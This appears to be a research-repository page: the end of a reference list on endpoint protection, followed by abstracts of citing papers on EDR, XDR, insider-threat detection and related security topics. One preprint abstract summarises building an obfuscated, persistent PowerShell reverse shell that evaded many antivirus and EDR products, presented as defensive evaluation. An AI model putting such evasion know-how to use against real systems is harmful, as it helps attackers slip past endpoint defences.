[20] David Strom, “7 trends in advanced endpoint protection”, Availa
ble: https://www.networkworld .com/artic le/3089858/endpoint-protect
ion/7-trends-in-advanced-endpoint-protection.html [Accessed: March
.11,2018]
[21] Ponemon’s
Institute. “The 2017 State of Endpoint Security Risk,
pp2,
2017.
[22] Margaret Rouse. “data loss prevention (DLP),” Available:
https://whatis.te chtarget.com/definition/data-loss-prevention-DLP
[Accessed: September .17,2018]
[23] “Accidental or malicious insider threat: staff awareness makes the
difference,” Available:
https://www.itgovernance.co.uk/blog/accidental-or-malicious-
insider
-
threat-staff-awareness-makes-the-difference/ [Accessed: September
.16,2018]
[24] CrowdStrike. “2018 Global Threat Report”, pp79, 2018.
[25] S. Chandel, M. Yan, S. Chen, H. Jiang and T. Ni, "Threat Intelligence
Sharing Community: A Countermeasure Against Advanced Persistent
Threat," 2019 IEEE Conference on Multimedia Information Processing
and Retrieval (MIPR), San Jose, CA, USA, 2019, pp. 353 -359.Barkly.
Endpoint Protection Buyers Guide,” pp5-7, 2018.
[26] Lital Asher-Dothan, “Seven essential elements of modern endpoin
t security,” Available : https://www.cybereason.com/blog/7-elements
-of-modern-endpoint
-
security [Accessed: March .11,2018]
[27] Samuel, Arthur. "Some Studies in Machine Learning Using the Game
of Checkers." IBM Journal of Research and Development. 3 (3): 210
229.
[28] Fortinet. “FORTIGUARD 2018 THREAT PR EDICTIONS,” pp 4-7,
2017.
[29] Barkly, “Endpoint Protection Buyer’s Guide,” pp8-9, 2017
[30] Arcticwolf. “Endpoint Detection & Response Is Not Enough”,
Available: https://arcticwolf .com/reso urces/endpoint-detection-and-
response-is-not-enough/ [Accessed: September .25,2018]
[31] AV-TEST, “AV-TEST Product Review and Certification Report
Sep-Oct/2018” Available: h ttps://www .av-test.org/en/antivirus/bus
iness-windows-client/windows-10/october-2018/kaspersky-lab-endpoi
nt-security-11.0-184137/ [Accessed: January.11,2019]
[32] AV-C, “Real-World Protection Test July-November 2018”. Availa
ble: https://www.av-
comparatives.org/tests/real
-world-prote ction-test-
july-november-2018/ [Accessed: January.11,2019]
89
... "Endpoint Protection Measuring the Effectiveness of remediation technologies and Methodologies for insider threat" discuss the differences between EPP and EDR's failure to detect current threats as EPP is based on signature base detection, however, the study mentions that EDRs generate false positive which can alert a standard software as malicious. [16]. In "Defeating Modern Day Anti-Viruses for Defense Evaluation" they are presenting process injection evasion techniques targeting AVs including Symantec, VirusTotal, Hybrid Analysis, and next-generation Windows Defender, they were successfully evading them [17]. ...
... I incorporated more stealth functions, experimented with different persistence methods, and subjected this refined version to rigorous testing across an expanded range of antivirus solutions and Endpoint Detection and Response (EDR) systems. The table shows the list of (16) AVs and EDRs that was tested by the cyber community and the researcher. Note: some AV and EDR versions are not applicable due to some members in cyber community choose not to disclose the version. ...
... In this section, we are going to present the findings of our sixteen (16) leading EPP and EDR detection in the market of our PowerShell reverse shell version 1 and 2 in two formats PS1 and EXE, which test the fileless attacks along with the detection capability of the different persistence method which also leave a footprint on the hard disk. We have used Character mode obfuscation. ...
Preprint
Full-text available
These findings illuminate the potential vulnerabilities of current security solutions and highlight the need for enhanced detection strategies against fileless PowerShell threats. By offering critical insights, this research contributes to fortifying cybersecurity defenses against increasingly sophisticated fileless threats. As the frequency of fileless PowerShell attacks, which are exploited by Advanced Persistent Threat (APT) groups and cybercriminals continues to rise the need, for defense measures becomes more crucial than before. This study aims to explore the detection capabilities of defense mechanisms like Endpoint Detection and Response (EDR) and Advanced Antivirus (AV) solutions when faced with these threats. Currently APT groups and cybercriminals are favouring fileless PowerShell scripts due, to their ability to bypass defenses. Furthermore, the absence of antivirus solutions and EDRs can leave organizations exposed to attacks. This trend highlights the timeliness and critical significance of our research. I have developed and tested a novel PowerShell reverse shell, delivered in both PS1 and EXE formats, against sixteen 16 different security solutions. These include both paid and open-source Endpoint Detection and Response (EDR) systems, as well as total security and premium antivirus software. This study uniquely focuses on analyzing the impact of script-to-executable conversion and varying persistence methods on detection rates. Additionally, I evaluated the effect of stealthy functions embedded within the PowerShell scripts. Furthermore, I utilized PowerShell code obfuscation techniques to determine if they could evade current security solutions. Two different types of reverse shells were evaluated in a controlled environment. The initial version, which was publicly shared underwent testing, by the cybersecurity community. On the hand, the second version, which incorporated stealth techniques underwent private testing, on various antivirus and EDR systems. Preliminary results revealed that both the PS1 script and the EXE formats managed to successfully bypass many AVs, EDRs, and XDRs. These findings shed light on the potential vulnerabilities of current security solutions and underscore the need for enhanced detection strategies against fileless PowerShell threats. By offering critical insights, this research contributes to the fortification of cybersecurity defenses against increasingly sophisticated fileless threats.
... s, which demands a greater emphasis on cybersecurity as the digital landscape evolves (Mandal et al., 2023). This pressing concern has raised the need for a comprehensive approach to safeguarding sensitive data and systems (Khan, 2023), resulting in the development of a wide range of software products that offer a suite of protection technologies. (Chandel et. al., 2019). Implementing a secure infrastructure minimizes the likelihood of system vulnerabilities (Saeed, 2023). However, the significance of the human factor is becoming increasingly apparent, and it is well established that technical solutions alone cannot adequately prevent security breaches (Wiley et al., 2020). Research suggests that it is ...
Article
Full-text available
The advent of teleworking has given rise to unique issues and opportunities within the field of cybersecurity, and employees may not have the acceptable level of awareness, knowledge, and behavior to effectively protect sensitive information and systems while working remotely. This research aims to conduct quantitative research anchored in the theory of planned behavior (TPB) and investigate the factors influencing Filipino teleworkers' intention to engage in secure behavior, primarily in the areas of password management, infrastructure security, email security management, organizational security policy, organizational support and training, and perceptions of security. This study employed multiple linear regression analysis to validate the hypotheses and identify the significant factors that will influence the teleworkers' information security behavior. Results show that not all predictors were perceived as relevant security factors by the respondents, which can potentially lead to security lapses. To enhance employees' information security behavior, this study proposed an integrated, three-pronged collaborative strategy involving both employees and the organization, with mutual accountability. This strategy targets critical areas such as infrastructure security management, organizational security policy, and organizational support and training. By prioritizing these aspects, organizations can effectively bolster security measures and cultivate a culture of heightened security awareness, thus mitigating potential risks.
... Therefore, the presence of XDR complements the endpoint security system, namely EDR [5]. The following are key features in EDR that help manage endpoint device security [18]: a) Threat Intelligence: Threat Intelligence in EDR makes it possible to warn or notify potential risks and threats based on the analysis results. ...
Article
Full-text available
The development of technology has provided many benefits in providing services to the community and helping to manage government efficiently. However, increasing reliance on technology also indirectly increases the risk of cyberattacks. Every company has the threat of cyber attacks from hackers who try to access and possess important and confidential assets both from inside and outside the company. To protect these assets, a cybersecurity system is needed that is able to protect against various threats of attack from irresponsible parties. A layered cybersecurity system is needed to be able to detect and respond to cyber attacks that occur automatically. XDR is a tool to detect and respond to cyber attacks based on the results of data analysis throughout the infrastructure with the aim of improving the efficiency of security operations. In addition, a system is also needed that is able to detect, alert, investigate, isolate and remove malicious software at endpoints in real-time, this system is called EDR. The test results after the implementation of the security system are systems that can monitor cyber attacks that appear in real-time, provide an automatic response so that information security on servers and endpoint devices can be protected.
... Furthermore, academic studies delve into the effectiveness of endpoint security technologies and methodologies in mitigating insider threats and protecting critical infrastructures. By leveraging information technology, organisations can implement endpoint security solutions tailored to their specific needs and environments, thus reducing the risk of data breaches and unauthorised access (Chandel et al., 2019). This interdisciplinary approach, combining insights from IT and cybersecurity domains, underscores the importance of proactive measures in securing network endpoints to ensure the integrity and confidentiality of sensitive information. ...
Conference Paper
Full-text available
Cybersecurity is a critical global concern, demanding proactive measures amidst evolving threats. Numerous contemporary authors highlight persistent trends that require strategic attention to safeguard economies and societies. Both academic research and industry practice emphasise proactive strategies to mitigate risks and integrate cybersecurity into organisational strategies. However, there is a gap from the business perspective in understanding how information systems interact with cybersecurity measures. This study aims to bridge this gap by investigating the perspective of Information Systems management on cybersecurity. Through exploratory research and desktop analysis, we propose a model that integrates insights from the Information Management Body of Knowledge (IMBOK) and cybersecurity architecture to enhance comprehension. By elucidating the strategic dimensions of cybersecurity within the Information Systems management discipline, this study aims to assist practitioners and business leaders in understanding the alignment of cybersecurity goals with organisational objectives, thereby enhancing resilience against cyber threats and enabling business continuity and growth.
... Endpoint Detection and Response (EDR) solutions, designed to identify and mitigate threats at the endpoint level, are expected to undergo a transformation with a dedicated focus on malicious insider threats [92]. EDR systems will likely integrate features that closely monitor file access patterns, application usage, and user authentication behavior to discern anomalous activities indicative of insider threats [93]. ...
Article
Full-text available
Insider threat detection has become a paramount concern in modern times where organizations strive to safeguard their sensitive information and critical assets from malicious actions by individuals with privileged access. This survey paper provides a comprehensive overview of insider threat detection, highlighting its significance in the current landscape of cybersecurity. The review encompasses a broad spectrum of methodologies and techniques, with a particular focus on classical machine-learning approaches and their limitations in effectively addressing the intricacies of insider threats. Furthermore, the survey explores the utilization of modern deep learning and natural language processing (NLP) based methods as promising alternatives, shedding light on their advantages over traditional methods. This analysis underscores the need for sophisticated solutions that can adapt to evolving threat landscapes and accommodate the intricacies of human behavior. In the conclusion section, the paper offers valuable insights into the future directions of insider threat detection. It advocates for the integration of more sophisticated time-series-based techniques, recognizing the importance of temporal patterns in insider threat behaviors. Additionally, the survey underscores the potential of NLP and large language model-based approaches, which can enhance threat detection by deciphering textual and contextual information. These recommendations reflect the evolving nature of insider threats and emphasize the need for proactive, data-driven strategies to safeguard organizations against internal security breaches. In conclusion, this survey not only underscores the urgency of addressing insider threats but also provides a roadmap for the adoption of advanced methodologies to enhance detection and mitigation capabilities in contemporary cybersecurity paradigms.
Chapter
PCI DSS is a contractual obligation rather than a mandatory regulation to be taken up with diligence and care in organizations. But PCI DSS is a globally recognized standard that applies to organizations involved in processing, storing, or transmitting payment card information. This chapter provides an overview of PCI DSS, emphasizing its key components, objectives, and significance in the world of electronic payment security. PCI DSS sets rigorous security requirements for organizations that oversee payment card data. Compliance with PCI DSS helps organizations reduce the risk of data breaches, fraud, and financial losses while also safeguarding consumer trust and ensuring the integrity of payment card transactions. Endpoint security is a critical facet of modern cybersecurity. Endpoint security is vital for ensuring the confidentiality, integrity, and availability of sensitive data, as well as maintaining the overall security posture of organizations. This chapter will focus on the key requirements of endpoint controls within PCI DSS compliance and their effectiveness.
Conference Paper
Full-text available
This paper describes our research on the insider threats of Social engineering. Social engineering is a method using interaction between humans to get the access of a system in an illegal way. Due to staff’s lack of confidentiality, the confidentiality of records is compromised, data is stolen or financial damage is done. This is insider threat. Social engineering and insider threat are two of the most relevant subjects in cyber security today. This research summarizes and seeks solution for the drawback of Social engineering through analyzing the Insider Threat cases. The first stage is to introduce the importance of using social engineering to reduce internet crime by analyzing the past loss created by insider threats. The second test illustrates insider threats’ hazards to network security are ongoing. The third part covers the situation of insider threats with the emphasis on the security side. The topic of security aspect is extended to the rest of internal control of system, data exchange, and management of employees and their communication content. Actually, by the time of this abstract, insider threats are still not being taken as seriously as it should be. Many companies and organizations have given little thought to the insider threat but have concentrated on keeping attackers outside the network. This research will directly focus on the insider threats of organizations and the ways hackers use social engineering with the latest analysis of technology involved and examples that are close to common cybercrime. We aim to reveal the importance of reducing insider threats in organizations. The further research will be focused on a group consisted of managers and engineers within a company and the communication means of staff to the outside world. The analysis of the related crime cases will help prevent similar tragedy and seek possible approaches. Key Words— Social engineering; Insider threat; Cyber Crime; Cyber security; Organization; Hackers
Conference Paper
Full-text available
The threat that malicious insiders pose towards organisations is a significant problem. In this paper, we investigate the task of detecting such insiders through a novel method of modelling a user's normal behaviour in order to detect anomalies in that behaviour which may be indicative of an attack. Specifically, we make use of Hidden Markov Models to learn what constitutes normal behaviour, and then use them to detect significant deviations from that behaviour. Our results show that this approach is indeed successful at detecting insider threats, and in particular is able to accurately learn a user's behaviour. These initial tests improve on existing research and may provide a useful approach in addressing this part of the insider-threat challenge.
Conference Paper
Insider threat detection represents a challenging problem to companies and organizations where malicious actions are performed by authorized users. This is a highly skewed data problem, where the huge class imbalance makes the adaptation of learning algorithms to the real world context very difficult. In this work, applications of genetic programming (GP) and stream active learning are evaluated for insider threat detection. Linear GP with lexicase/multi-objective selection is employed to address the problem under a stationary data assumption. Moreover, streaming GP is employed to address the problem under a non-stationary data assumption. Experiments conducted on a publicly available corporate data set show the capability of the approaches in dealing with extreme class imbalance, stream learning and adaptation to the real world context.
Conference Paper
Organizations face a persistent challenge detecting malicious insiders as well as outside attackers who compromise legitimate credentials and then masquerade as insiders. No matter how good an organization's perimeter defenses are, eventually they will be compromised or betrayed from the inside. Monitored decoy documents (honey files with enticing names and content) are a promising approach to aid in the detection of malicious masqueraders and insiders. In this paper, we present a new technique for decoy document distribution that can be used to improve the scalability of insider detection. We develop a placement application that automates the deployment of decoy documents and we report on two user studies to evaluate its effectiveness. The first study indicates that our automated decoy distribution tool is capable of strategically placing decoy files in a way that offers comparable security to optimal manual deployment. In the second user study, we measure the frequency that normal users access decoy documents on their own systems and show that decoy files do not significantly interfere with normal user tasks.
Conference Paper
Most insider attacks done by people who have the knowledge and technical know-how of launching such attacks. This topic has long been studied and many detection techniques were proposed to deal with insider threats. This short paper summarized and classified insider threat detection techniques based on strategies used for detection.
Article
With the increasing amount of network throughput and security threat, the study of intrusion detection systems (IDSs) has received a lot of attention throughout the computer science field. Current IDSs pose challenges on not only capricious intrusion categories, but also huge computational power. Though there is a number of existing literatures to IDS issues, we attempt to give a more elaborate image for a comprehensive review. Through the extensive survey and sophisticated organization, we propose the taxonomy to outline modern IDSs. In addition, tables and figures we summarized in the content contribute to easily grasp the overall picture of IDSs.